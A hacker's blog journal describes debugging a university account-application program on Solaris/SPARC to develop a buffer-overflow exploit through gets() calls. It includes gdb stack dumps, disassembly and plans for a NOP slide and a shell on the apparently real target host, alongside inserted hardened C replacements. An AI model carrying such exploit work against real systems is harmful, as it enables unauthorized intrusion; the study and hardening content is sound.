Pearl — Hacking Apply Pt III
First was to obtain the source code from blade72,
/sources/apply-1.2
This wasn’t advertised; I happened to be digging around the filesystem one day and accidentally stumbled upon it :)
Fortunately it’s pre-compiled. I move the sources to my own box and run it.
I need to make the /home/apply user directory (I need to create the whole apply user, really) and the /home/apply/setup file.
[code]
-bash-4.3$ cat /home/apply/setup
cs320-1|Applied Discrete Math|Prof. E. Polker|||||
[/code]
The above wasn’t given to me; I had to figure out the format from this incomplete snippet:
[code lang="c"]
load_params(Param_set)
struct param_set Param_set[];
{
    int fd, i, j, n, linecnt;
    char *a, *b, *bufend, *recend;
    struct param_set *p;
    struct group *g;

    DBUG(HELLO,"load_params()\n",NULL);
    if ( (fd=open(SETUP,O_RDONLY)) < 0 )
        fatal("Cannot open SETUP file.\n");
    /*
     * For now read the whole file.  If it becomes worth it,
     * take the trouble to read lines and discard comments.
     */
    bufend = (buf - 1 + sizeof(buf));
    n=1;    /* kick start the loop -- ugly! */
    for ( b=buf ; n > 0 && b < (bufend-BUFSIZ) ; b += n )
        if ( (n=read(fd,b,BUFSIZ)) < 0 )
            fatal("Read error while getting SETUP file.\n");
    if ( b >= bufend ) {
        fatal("Out of buffer space for parameter sets.\n");
    } else
        bufend = b;     /* remember where end of buffered data is */
    close(fd);
    *bufend = EOS;
    /*
     * Now chug along the buffer, initializing the Param_set array.
     */
    for ( linecnt = 1, i = 0, b = buf, p = Param_set;
          ( i < NPSETS && b < bufend );
          linecnt++, b = recend + 1 ) {
        DBUG(8,"Parsing SETUP line %d:\n",linecnt);
        if ((recend=index(b,EOL)) == 0)
            /* somebody emacs'd SETUP and missed the last linefeed */
            recend = bufend;
        *recend = EOS;
        if ( *b != COMMENT ) {
            setptr(&p->gr_name, &a,&b,linecnt);
            setptr(&p->course_name, &a,&b,linecnt);
            setptr(&p->instructor, &a,&b,linecnt);
            setptr(&p->notify_apply, &a,&b,linecnt);
            setptr(&p->notify_reply, &a,&b,linecnt);
            setptr(&p->course_time, &a,&b,linecnt);
            setptr(&p->acct_type, &a,&b,linecnt);
            DBUG(IGNORE,"group name: %s\n",p->gr_name);
#ifdef REPLY    /* apply doesn't care about homes or group id's */
            setgrent();     /* open/rewind group file */
            if ((g=getgrnam(p->gr_name)) == NULL) {
                printf("Group %s: ",p->gr_name);    /* tacky */
                fatal("Cannot get gid from /etc/group.\n");
            }
            p->gr_gid = g->gr_gid;
            DBUG(8,"gid found: %d\n",p->gr_gid);
            for (j=0; b<recend && j<MAXHOMES; j++,b=a+1) {
                p->homes[j] = b;
                a = index(b,SFS);
                if (a != 0)
                    *a = EOS;
                else
                    a = recend;
                DBUG(8,"\t\tp->homes[%d]==",j);
                DBUG(8,"%s\n",b);
            }
            p->homes[j] = NULL;     /* flag end of valid entries */
#endif /* REPLY */
            i++;
            p++;
        }
    }
#ifdef REPLY
    endgrent();     /* close group file */
#endif /* REPLY */
    if ( b < bufend && i >= NPSETS )
        fatal("Out of data structures for parameter sets!");
    DBUG(4,"load_params returning %d\n",i);
    return(i);      /* Number of sets loaded into array */
}

setptr(p,a,b,linecnt)
char **p, **a, **b;
{
    *p = *b;
    if ((*a = index(*b,PFS)) != 0) {
        **a = EOS;
        *b = *a+1;
    } else {
        printf("Broken record in SETUP file: line %d.\n", linecnt);
        fatal("Cannot continue.");
    }
}
[/code]
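A bounded parser for the SETUP record format that load_params() and setptr() read above, added here as an educational example; it is not apply's own code. Where setptr() leaves pointers into one shared buffer and calls fatal() on a short record, this version copies each of the seven '|'-terminated fields into a fixed-size array, rejects records that are too short or whose fields would not fit, and hands the result code back to the caller. The '|' separator is taken from the setup file shown above; the '#' comment marker and the 64-byte field size are assumptions, since the page never shows the values of COMMENT or the struct's field sizes.

```c
/* Bounded parser for one SETUP record (educational example, not apply's code).
 * Record layout, from load_params() above: seven PFS-terminated fields
 *   gr_name|course_name|instructor|notify_apply|notify_reply|course_time|acct_type|
 * Anything after the seventh separator (the REPLY-only home list) is ignored here. */
#include <stdio.h>
#include <string.h>

#define PFS      '|'   /* primary field separator, as in the setup file shown */
#define COMMENT  '#'   /* assumed: the page uses COMMENT but never shows its value */
#define NFIELDS  7
#define FIELDLEN 64    /* assumed per-field capacity, including the terminator */

struct param_rec {
    char gr_name[FIELDLEN];
    char course_name[FIELDLEN];
    char instructor[FIELDLEN];
    char notify_apply[FIELDLEN];
    char notify_reply[FIELDLEN];
    char course_time[FIELDLEN];
    char acct_type[FIELDLEN];
};

enum setup_status {
    SETUP_OK      =  0,
    SETUP_COMMENT =  1,   /* line starts with COMMENT: nothing to load */
    SETUP_SHORT   = -1,   /* fewer than NFIELDS separators ("Broken record") */
    SETUP_TOOLONG = -2    /* a field would not fit its destination array */
};

/* Copy one PFS-terminated field from *cursor into dst (at most cap-1 bytes)
 * and advance *cursor past the separator.  Returns a setup_status value. */
static int take_field(const char **cursor, char *dst, size_t cap)
{
    const char *start = *cursor;
    const char *sep = strchr(start, PFS);
    if (sep == NULL)
        return SETUP_SHORT;          /* the case setptr() answers with fatal() */
    size_t len = (size_t)(sep - start);
    if (len >= cap)
        return SETUP_TOOLONG;        /* the original has no such check */
    memcpy(dst, start, len);
    dst[len] = '\0';
    *cursor = sep + 1;
    return SETUP_OK;
}

/* Parse one record line (newline optional) into *out.  On any error the
 * record is zeroed so a half-filled entry can never be used by accident. */
int parse_setup_record(const char *line, struct param_rec *out)
{
    if (line[0] == COMMENT)
        return SETUP_COMMENT;
    char *fields[NFIELDS] = {
        out->gr_name, out->course_name, out->instructor, out->notify_apply,
        out->notify_reply, out->course_time, out->acct_type
    };
    const char *cursor = line;
    for (int i = 0; i < NFIELDS; i++) {
        int rc = take_field(&cursor, fields[i], FIELDLEN);
        if (rc != SETUP_OK) {
            memset(out, 0, sizeof *out);
            return rc;
        }
    }
    return SETUP_OK;
}

int main(void)
{
    /* Constructed input: the record from /home/apply/setup shown above. */
    struct param_rec r;
    int rc = parse_setup_record("cs320-1|Applied Discrete Math|Prof. E. Polker|||||", &r);
    printf("status %d: group=%s course=%s instructor=%s\n",
           rc, r.gr_name, r.course_name, r.instructor);
    return 0;
}
```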
I learned a few IMPORTANT things.
I can send a buffer overflow through a raw PTY through SSH :) Did IT!
Compiling an app with or without debugging symbols does not affect the stack address.
I also now know it’s very important to attack the original binary, if at all possible, because details such as how stack frames are restored may differ between your own compilation of the program and the original.
Found my buffer overflow attack vector: register as a new user, derp passwd, ugrad, sign up, register 1 group course, q, then at “is this ok?” say “n”, and then put in a large buffer that starts with ‘q’ – q is for the first char to be processed as a direct return. Then you must agree that it looks “OK” with ‘y’. Hopefully that caller stack is not too borked in that it can still get to the return. If we get that far.. well, sweet sauce.
It’s very important to ensure the nested target functions both ret/restore at the end of their functions. This ensures the stack is getting rotated and return values are popping.
[code]
-bash-4.3$ cd latest/apply-1.2-stock/
-bash-4.3$ ls
Makefile         apply-externs.o  make.history     reply-subr.o
OLD              apply-subr.o     make.out         reply.c
RCS              apply.c          mkaccounts       reply.o
README           apply.o          passwd.c         reply.real
add_groups       externs.c        ply.h            script
add_groups.c     how_to.tex.f90   reply            subr.c
apply            invoke2          reply-externs.o
-bash-4.3$ $PWD/invoke2 -d apply
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)
(gdb) break Review
Breakpoint 1 at 0x12434
(gdb) r
Starting program: /home/bazz/latest/apply-1.2-stock/apply
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Welcome to ---------, our host that handles account applications.

This program collects information needed to create accounts, and queues
applications for action by the system administrator.  When all your
information has been collected, you will have the chance to review your
application and re-enter any information that is not correct.

If you make a mistake in typing, you can back up on the line by pressing
the DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters
-- your input may appear to have been fixed but will really contain garbage.
If you press the RETURN key before noticing an error, do not worry.  Simply
continue answering questions, and re-enter the information later during
the review phase.

Press RETURN to continue.
Do you already have an account with us (y or n)? n

Enter your chosen login name.  It can be up to 8 characters long, and
should only use lowercase letters and digits.  Please use your first
initial and last name, as in jdoe, unless you have a strong preference
otherwise.

Login name? jdoe

Please enter your full name.  Be sure to use upper and lower case, as in
John Q. Public.  It is very important to get this right, as this is how
your name will appear on lab access lists and in mail messages you send.

Full name? jdoe

Enter a password consisting of printable characters, spaces or tabs.
It can be as long as you like, but only the first 8 characters matter.
Do not use your login or real name in any form -- too easy to guess.

    **-*-* Do not give your password to anybody under any circumstances! *-*-**

As you type in your password, characters will not be echoed to your
screen.  This is to protect your account.  To be sure you did not
mis-type anything, you will be asked to enter your password a second time.

Password:
Again:
[Note : the password has to be entered via a PTY Master ]

Please describe yourself by choosing one of these menu items:

 1) ugrad     Undergraduate student enrolled in one or more CS courses
 2) grad      Graduate student enrolled in one or more CS courses
 3) alumni    Alumnus of Math and CS
 4) faculty   Member of the Math and CS faculty
 5) staff     Member of the Math and CS professional or classified staff
 6) crtsy     Courtesy account applicant that has spoken to the Sys Admin
 7) None of the above.  (This will abandon the application!)

Menu item number [1-7] or command [tpx?] : 1

Now you will be shown a list of the available groups.  Classes are set up
as UNIX groups, and there are groups for other kinds of accounts, too.
Please enter the number(s) of the group(s) or class(es) that you belong
in.  Enter them one at a time.  When there are no more to enter, type q
to stop.  Remember that if you make an error, you will have a chance to
do this again.

Sometimes the list is more than a screenful, so we use the `more` command
to present a screenful at a time.  If you see the '[More]' prompt, then
press RETURN for the next line, SPACE for the next screen.  You may want
to write down the menu item numbers for your course(s).

Press RETURN to continue.

These are the categories of accounts:

 1) cs320-1   Applied Discrete Math   Prof. E. Bolker

Press RETURN to see menu again; 'q' to quit adding groups; '?' for more help.
Please enter a group number [1-1] or command [cptqx?] : 1
Press RETURN to see menu again; 'q' to quit adding groups; '?' for more help.
Please enter a group number [1-1] or command [cptqx?] : q

Breakpoint 1, 0x00012434 in Review ()
(gdb) x/5i $pc
0x12434 <Review+8>:     sethi  %hi(0x29000), %g1
0x12438 <Review+12>:    or  %g1, 0x1a0, %o5     ! 0x291a0 <_iob+16>
0x1243c <Review+16>:    sethi  %hi(0x29000), %g1
0x12440 <Review+20>:    or  %g1, 0x1a0, %g1     ! 0x291a0 <_iob+16>
0x12444 <Review+24>:    ld  [ %g1 ], %g1
(gdb) x/5i $pc-8
0x1242c <Review>:       save  %sp, -112, %sp
0x12430 <Review+4>:     st  %i0, [ %fp + 0x44 ]
0x12434 <Review+8>:     sethi  %hi(0x29000), %g1
0x12438 <Review+12>:    or  %g1, 0x1a0, %o5     ! 0x291a0 <_iob+16>
0x1243c <Review+16>:    sethi  %hi(0x29000), %g1
(gdb) x/96x $sp
0xffbefd58:     0xffbef9a8      0x00028d90      0x00000000      0x00000000
0xffbefd68:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefd78:     0x00027ccc      0x00028d91      0x0002919e      0x00000001
0xffbefd88:     0xff33c008      0x00000003      0xffbefdc8      0x00011434
0xffbefd98:     0x00000000      0x00027ccc      0x00027cc0      0x00000031
0xffbefda8:     0x00000032      0x00000000      0x00000001      0x00000000
0xffbefdb8:     0xff33f014      0xff320208      0xffbefdc8      0x0001135c
0xffbefdc8:     0xff33e5f0      0x00000000      0x00000000      0x00000000
0xffbefdd8:     0x00000000      0x00000000      0x00000000      0xff3de7a8
0xffbefde8:     0x00000001      0xffbefebc      0xffbefec4      0x0002a6e4
0xffbefdf8:     0x00000000      0x00000000      0xffbefe58      0x00010fec
0xffbefe08:     0x00000000      0x00027ccc      0xffbefe78      0x00000000
0xffbefe18:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe28:     0x00000003      0x00000000      0x00000000      0x00000000
0xffbefe38:     0x00000000      0xffffffff      0x00000000      0x00000000
0xffbefe48:     0x00000000      0x00000000      0xffbefe58      0x00010fac
0xffbefe58:     0x00000001      0xffbefebc      0x00000000      0x00000000
0xffbefe68:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe78:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe88:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe98:     0x00000000      0x00000001      0xffbefebc      0x00000000
0xffbefea8:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefeb8:     0x00000001      0xffbeff50      0x00000000      0xffbeff78
0xffbefec8:     0xffbeff83      0xffbeff8c      0xffbeffb2      0x00000000
(gdb) b Edit
Breakpoint 2 at 0x12564
(gdb) c
Continuing.

Name:           jdoe
Login:          jdoe
Account type:   ugrad
Group(s):       cs320-1

Is this okay (y or n)? n

Breakpoint 2, 0x00012564 in Edit ()
(gdb) x/96x $sp
0xffbefce0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefcf0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefd00:     0x00027ccc      0x000291a0      0x0000000a      0x00000002
0xffbefd10:     0xff33c008      0x000291a0      0xffbefd58      0x000124cc
0xffbefd20:     0xff33c008      0x000291a0      0x00025cc0      0xff343a54
0xffbefd30:     0x00000000      0x000294e0      0x00000000      0x000291a0
0xffbefd40:     0x00000001      0x00000001      0xff33c008      0x000291a0
0xffbefd50:     0xffbefd58      0x00012468      0xffbef9a8      0x00028d90
0xffbefd60:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefd70:     0x00000000      0x00000000      0x00027ccc      0x00028d91
0xffbefd80:     0x0002919e      0x00000001      0xff33c008      0x00000003
0xffbefd90:     0xffbefdc8      0x00011434      0x00000000      0x00027ccc
0xffbefda0:     0x00027cc0      0x00000031      0x00000032      0x00000000
0xffbefdb0:     0x00000001      0x00000000      0xff33f014      0xff320208
0xffbefdc0:     0xffbefdc8      0x0001135c      0xff33e5f0      0x00000000
0xffbefdd0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefde0:     0x00000000      0xff3de7a8      0x00000001      0xffbefebc
0xffbefdf0:     0xffbefec4      0x0002a6e4      0x00000000      0x00000000
0xffbefe00:     0xffbefe58      0x00010fec      0x00000000      0x00027ccc
0xffbefe10:     0xffbefe78      0x00000000      0x00000000      0x00000000
0xffbefe20:     0x00000000      0x00000000      0x00000003      0x00000000
0xffbefe30:     0x00000000      0x00000000      0x00000000      0xffffffff
0xffbefe40:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe50:     0xffbefe58      0x00010fac      0x00000001      0xffbefebc
(gdb)
[/code]
[code]
-bash-4.3$ pwd
/home/bazz/latest/apply-1.2-stock
-bash-4.3$
-bash-4.3$ ./apply&

Welcome to --------, our host that handles account applications.

This program collects information needed to create accounts, and queues
applications for action by the system administrator.  When all your
information has been collected, you will have the chance to review your
application and re-enter any information that is not correct.

If you make a mistake in typing, you can back up on the line by pressing
the DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters
-- your input may appear to have been fixed but will really contain garbage.
If you press the RETURN key before noticing an error, do not worry.  Simply
continue answering questions, and re-enter the information later during
the review phase.

Press RETURN to continue.
[1] 1092

[1]+  Stopped                 ./apply
-bash-4.3$ pmap 1092
1092:   ./apply
00010000      24K read/exec         apply
00024000       8K read/write/exec   apply
00026000      24K read/write/exec     [ heap ]
FF180000     576K read/exec         /usr/lib/libnsl.so.1
FF210000      40K read/write/exec   /usr/lib/libnsl.so.1
FF21A000      24K read/write/exec   /usr/lib/libnsl.so.1
FF250000      16K read/exec         /usr/platform/sun4u/lib/libc_psr.so.1
FF260000      16K read/exec         /usr/lib/libmp.so.2
FF274000       8K read/write/exec   /usr/lib/libmp.so.2
FF280000     688K read/exec         /usr/lib/libc.so.1
FF33C000      32K read/write/exec   /usr/lib/libc.so.1
FF350000       8K read/write/exec     [ anon ]
FF360000       8K read/write/exec   /usr/lib/libdl.so.1
FF370000      40K read/exec         /usr/lib/libsocket.so.1
FF38A000       8K read/write/exec   /usr/lib/libsocket.so.1
FF3A0000     184K read/exec         /usr/lib/ld.so.1
FF3DE000       8K read/write/exec   /usr/lib/ld.so.1
FF3E0000       8K read/write/exec   /usr/lib/ld.so.1
FFBEE000       8K read/write/exec     [ stack ]
 total      1728K
-bash-4.3$
[/code]
This says that the stack in apply is also 8K, like in the test vuln program, and also starts at the same address.
TO BE CONTINUED —
from here on out I will keep it a secret and just let it go….. NAHT
I am going to exploit an overflow in the above targeted stack frames.
After I create a specific targeted exploit, I will then learn how to do a NOP slide with automatic slicing offsets.
The current end goal is to be able to ssh into the target application, manually navigate to the vulnerable section, and press CTRL-D to trigger the buffer overflow. If a shell is spawned, disable all signal catchers by throwing another separate signal. Then haxxor away. Tell teh feds.
But if the shell doesn’t spawn, an automatic slice counter should increment when the buffer signal is sent. I will then reconnect and perform manual duties: send the buffer. This shouldn’t have to be done more than 9 or 10 times at most, given that the stack is 8192 bytes and the buffer is 1024 bytes before it even starts to overflow. Plenty of room for a great NOP slide.. I will have to investigate the premium buffer. I am leaning towards putting the payload before the return address to make use of the guaranteed 1024 bytes plus the few bytes after 1024 that come before the %fp. Will have to calculate that.. Alright PEACE!
BACK AGAIN
[code]
-bash-4.3$ ./pty_apply
Opening master device
Doing Grantpt()
Unlocking pt
getting stdin termios
getting window settings
---Getting slave name
---Opening slave
Forking
in CHILD:
---Setsid()
---Pushing ptem module to slave
---Pushing ldterm module to slave
---setting term settings
---setting window settings
In Parent:
This shell is interactive
bazz@life[pts/8][~/latest/pty]
bazz@life[pts/8][~/latest/pty]
bazz@life[pts/8][~/latest]
bazz@life[pts/8][~/latest]
bazz@life[pts/8][~/latest]
bazz@life[pts/8][~/latest]
bazz@life[pts/8][~/latest]
[/code]
In the middle of the blind chaos I have to do:
[code]
stty echo
[/code]
[code]
bazz@life[pts/8][~/latest] cd ~/latest/apply-1.2-stock/
bazz@life[pts/8][~/latest/apply-1.2-stock] $PWD/invoke2 -d apply
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)
(gdb) break Review
Breakpoint 1 at 0x12434
(gdb) break Edit
Breakpoint 2 at 0x12564
(gdb) r
Starting program: /home/bazz/latest/apply-1.2-stock/apply
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Welcome to --, our host that handles account applications.

This program collects information needed to create accounts, and queues
applications for action by the system administrator.  When all your
information has been collected, you will have the chance to review your
application and re-enter any information that is not correct.

If you make a mistake in typing, you can back up on the line by pressing
the DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters
-- your input may appear to have been fixed but will really contain garbage.
If you press the RETURN key before noticing an error, do not worry.  Simply
continue answering questions, and re-enter the information later during
the review phase.

Press RETURN to continue.
Do you already have an account with us (y or n)?
[/code]
At this point it’s important to note that I have to use CTRL-J to make the newline, and hence continue.
It turns out that the attack vector illustrated above is not going to work. The buffer passed into gets() is a global buffer; I need something local for this to be easy. So I search around and I find this:
...
Never mind, it was an #ifdef code block that doesn’t actually count :(
gets(buf) from Login() looks good
[code lang="c"]
Login(datap)
struct info *datap;
{
    struct passwd *pw;
    char buf[1024], *ch, c;
    int okay, n;

    DBUG(HELLO,"** Login()\n",NULL);
    if (action == MODIFY) {
        printf("You cannot change the login name of an existing account!\n");
        printf("If you MUST change your login see the system administrator.\n");
        return(0);
    }
    for ( okay=FALSE; okay==FALSE; ) {
        blurb(Login_inst);
        printf("Login name? ");
        gets(buf);
[/code]
>_< Never mind:
[code lang="c"]
        if ((n=strlen(buf)) < 1)
            continue;
        else {
            if (n > MAXLOGLEN) {
                printf("Your login name must not be longer than %d characters.\n", MAXLOGLEN);
                printf("Please try again.\n");
                contin
[/code]
How about the YES-OR-NO prompt?!?!
[code lang="c"]
/* Ask a yes-or-no question. */
askyorn(prompt)
char *prompt;
{
    char c[SBUF];
    int n;

    for (n=0; n < 10; ++n){
        printf("%s (y or n)? ", prompt);
        gets(c);
        switch (c[0]){
            case 'y':
            case 'Y':
                return(1);
            case 'n':
            case 'N':
                return(0);
            default :
                printf("Please answer y or n: ");
                continue;
        }
    }
    return(0);  /* return negative if they can't get it right */
}
[/code]
I THINK WE HAVE A WINNER
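For contrast, a hardened replacement for askyorn() (and for the gets(buf) read in Login() above, which has the same shape), added here as an example; it is not apply's code. The original reads the answer with gets() into a fixed stack array, so the person typing decides how many bytes land in the frame. This version bounds the read with fgets(), drains the remainder of an over-long line so it cannot be consumed as the next answer, and takes a FILE* so it can be exercised against constructed input. SBUF is assumed to be 80 since the page never shows its value; constructed_input() and run_scripted() are test scaffolding, not part of the program.

```c
/* Hardened askyorn() (educational example, not apply's code).  Same contract
 * as the original where it can be kept: 1 for yes, 0 for no, 0 after ten bad
 * answers; -1 on end of input, which the gets() version cannot report. */
#include <stdio.h>
#include <string.h>

#define SBUF      80    /* assumed: the page never shows SBUF's value */
#define MAX_TRIES 10    /* same retry count as the original */

/* Read one line into buf (cap bytes including the terminator).  A line that
 * does not fit is truncated and the rest of it is drained from the stream.
 * Returns 0 on success, -1 on EOF or error before any byte was read. */
static int read_line_bounded(FILE *in, char *buf, size_t cap)
{
    if (fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
    } else {
        int ch;     /* no newline seen: the line was longer than the buffer */
        while ((ch = fgetc(in)) != EOF && ch != '\n')
            ;
    }
    return 0;
}

int askyorn_safe(FILE *in, const char *prompt)
{
    char c[SBUF];
    int n;

    for (n = 0; n < MAX_TRIES; ++n) {
        printf("%s (y or n)? ", prompt);
        if (read_line_bounded(in, c, sizeof c) < 0)
            return -1;
        switch (c[0]) {
        case 'y': case 'Y':
            return 1;
        case 'n': case 'N':
            return 0;
        default:
            printf("Please answer y or n: ");
            continue;
        }
    }
    return 0;   /* give up, as the original does */
}

/* Constructed input stream: `head`, then `filler` copies of 'A', then `tail`.
 * Test scaffolding only, so the function can be run offline. */
FILE *constructed_input(const char *head, size_t filler, const char *tail)
{
    FILE *f = tmpfile();
    if (f == NULL)
        return NULL;
    fputs(head, f);
    for (size_t i = 0; i < filler; i++)
        fputc('A', f);
    fputs(tail, f);
    rewind(f);
    return f;
}

/* Run one scripted exchange and return askyorn_safe()'s verdict
 * (-2 if the scratch file could not be created). */
int run_scripted(const char *head, size_t filler, const char *tail)
{
    FILE *f = constructed_input(head, filler, tail);
    if (f == NULL)
        return -2;
    int rc = askyorn_safe(f, "Is this okay");
    fclose(f);
    return rc;
}

int main(void)
{
    /* A 6000-byte junk answer followed by "y": the junk is truncated to the
     * buffer and drained, then the next line is read cleanly as the answer. */
    printf("\n-> %d\n", run_scripted("", 6000, "\ny\n"));
    printf("\n-> %d\n", run_scripted("n\n", 0, ""));
    return 0;
}
```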
My goal is to be able to return into the overflowed buffer before the apply program submits any recorded data. Then someone could figure something out a lot more easily. I just found my way in.
WELL I RAN into a new problem. The PTY write of a large buffer cuts out around 1300-1400. I wonder how I can get the full 6000 in there?? :( The answer is in fact that ‘stty echo’ should not be invoked; it has something to do with it somehow…
AND THIS is the life of someone hacking from a raw terminal:
[code]
bazz@life[pts/15][~/latest/apply-1.2-stock]

Welcome to ------, our host that handles account applications.

This program collects information needed to create accounts, and queues
applications for action by the system administrator.  When all your
information has been collected, you will have the chance to review your
application and re-enter any information that is not correct.

If you make a mistake in typing, you can back up on the line by pressing
the DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters
-- your input may appear to have been fixed but will really contain garbage.
If you press the RETURN key before noticing an error, do not worry.  Simply
continue answering questions, and re-enter the information later during
the review phase.

Press RETURN to continue.
Do you already have an account with us (y or n)?

Enter your chosen login name.  It can be up to 8 characters long, and
should only use lowercase letters and digits.  Please use your first
initial and last name, as in jdoe, unless you have a strong preference
otherwise.

Login name?

Enter your chosen login name.  It can be up to 8 characters long, and
should only use lowercase letters and digits.  Please use your first
initial and last name, as in jdoe, unless you have a strong preference
otherwise.

Login name?

Please enter your full name.  Be sure to use upper and lower case, as in
John Q. Public.  It is very important to get this right, as this is how
your name will appear on lab access lists and in mail messages you send.

Full name?

Enter a password consisting of printable characters, spaces or tabs.
It can be as long as you like, but only the first 8 characters matter.
Do not use your login or real name in any form -- too easy to guess.

    **-*-* Do not give your password to anybody under any circumstances! *-*-**

As you type in your password, characters will not be echoed to your
screen.  This is to protect your account.  To be sure you did not
mis-type anything, you will be asked to enter your password a second time.

Password:
Again:

Please describe yourself by choosing one of these menu items:

 1) ugrad     Undergraduate student enrolled in one or more CS courses
 2) grad      Graduate student enrolled in one or more CS courses
 3) alumni    Alumnus of Math and CS
 4) faculty   Member of the Math and CS faculty
 5) staff     Member of the Math and CS professional or classified staff
 6) crtsy     Courtesy account applicant that has spoken to the Sys Admin
 7) None of the above.  (This will abandon the application!)

Menu item number [1-7] or command [tpx?] :
You must select one of the choices.
Do you want to just forget the whole thing (y or n)?
Menu item number [1-7] or command [tpx?] :
Bus Error
bazz@life[pts/15][~/latest/apply-1.2-stock]
bazz@life[pts/15][~/latest/apply-1.2-stock]
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)
(gdb) Dump of assembler code for function Acct:
0x000114c0 <Acct+0>:    save  %sp, -136, %sp
0x000114c4 <Acct+4>:    st  %i0, [ %fp + 0x44 ]
0x000114c8 <Acct+8>:    sethi  %hi(0x25800), %g1
0x000114cc <Acct+12>:   or  %g1, 0x260, %o0     ! 0x25a60 <Acct_inst>
0x000114d0 <Acct+16>:   call  0x13274 <blurb>
0x000114d4 <Acct+20>:   nop
0x000114d8 <Acct+24>:   ld  [ %fp + 0x44 ], %g1
0x000114dc <Acct+28>:   add  %g1, 0x804, %g1
0x000114e0 <Acct+32>:   mov  %g1, %o0
0x000114e4 <Acct+36>:   sethi  %hi(0x13c00), %g1
0x000114e8 <Acct+40>:   or  %g1, 0x148, %o1     ! 0x13d48
0x000114ec <Acct+44>:   call  0x25820 <strcpy@plt>
0x000114f0 <Acct+48>:   nop
0x000114f4 <Acct+52>:   sethi  %hi(0x13c00), %g1
0x000114f8 <Acct+56>:   or  %g1, 0x150, %o0     ! 0x13d50
0x000114fc <Acct+60>:   mov  7, %o1
0x00011500 <Acct+64>:   call  0x257d8 <printf@plt>
0x00011504 <Acct+68>:   nop
0x00011508 <Acct+72>:   sethi  %hi(0x28c00), %g1
0x0001150c <Acct+76>:   or  %g1, 0x190, %o0     ! 0x28d90 <ibuf>
0x00011510 <Acct+80>:   call  0x25808 <gets@plt>
0x00011514 <Acct+84>:   nop
0x00011518 <Acct+88>:   mov  %o0, %g1
0x0001151c <Acct+92>:   cmp  %g1, 0
0x00011520 <Acct+96>:   bne  0x1154c <Acct+140>
0x00011524 <Acct+100>:  nop
0x00011528 <Acct+104>:  sethi  %hi(0x28c00), %g1
0x0001152c <Acct+108>:  or  %g1, 0x190, %o5     ! 0x28d90 <ibuf>
0x00011530 <Acct+112>:  mov  0x78, %g1
0x00011534 <Acct+116>:  stb  %g1, [ %o5 ]
0x00011538 <Acct+120>:  sethi  %hi(0x28c00), %g1
0x0001153c <Acct+124>:  or  %g1, 0x191, %g1     ! 0x28d91 <ibuf+1>
0x00011540 <Acct+128>:  clrb  [ %g1 ]
0x00011544 <Acct+132>:  b  0x11574 <Acct+180>
0x00011548 <Acct+136>:  nop
0x0001154c <Acct+140>:  sethi  %hi(0x28c00), %g1
0x00011550 <Acct+144>:  or  %g1, 0x190, %g1     ! 0x28d90 <ibuf>
0x00011554 <Acct+148>:  ldub  [ %g1 ], %g1
0x00011558 <Acct+152>:  sll  %g1, 0x18, %g1
0x0001155c <Acct+156>:  sra  %g1, 0x18, %g1
0x00011560 <Acct+160>:  cmp  %g1, 0
0x00011564 <Acct+164>:  bne  0x11574 <Acct+180>
0x00011568 <Acct+168>:  nop
0x0001156c <Acct+172>:  b  0x114f4 <Acct+52>
0x00011570 <Acct+176>:  nop
0x00011574 <Acct+180>:  sethi  %hi(0x28c00), %g1
0x00011578 <Acct+184>:  or  %g1, 0x190, %g1     ! 0x28d90 <ibuf>
0x0001157c <Acct+188>:  ldub  [ %g1 ], %g1
0x00011580 <Acct+192>:  sll  %g1, 0x18, %g1
0x00011584 <Acct+196>:  sra  %g1, 0x18, %g1
0x00011588 <Acct+200>:  st  %g1, [ %fp + -36 ]
0x0001158c <Acct+204>:  ld  [ %fp + -36 ], %g1
0x00011590 <Acct+208>:  cmp  %g1, 0x74
0x00011594 <Acct+212>:  be  0x115ec <Acct+300>
0x00011598 <Acct+216>:  nop
0x0001159c <Acct+220>:  ld  [ %fp + -36 ], %g1
0x000115a0 <Acct+224>:  cmp  %g1, 0x74
0x000115a4 <Acct+228>:  bg  0x115d4 <Acct+276>
0x000115a8 <Acct+232>:  nop
0x000115ac <Acct+236>:  ld  [ %fp + -36 ], %g1
0x000115b0 <Acct+240>:  cmp  %g1, 0x3f
0x000115b4 <Acct+244>:  be  0x11824 <Acct+868>
